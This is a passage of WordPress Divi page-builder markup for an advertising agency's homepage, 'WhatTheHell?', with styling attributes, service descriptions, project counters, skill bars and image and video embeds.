button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" 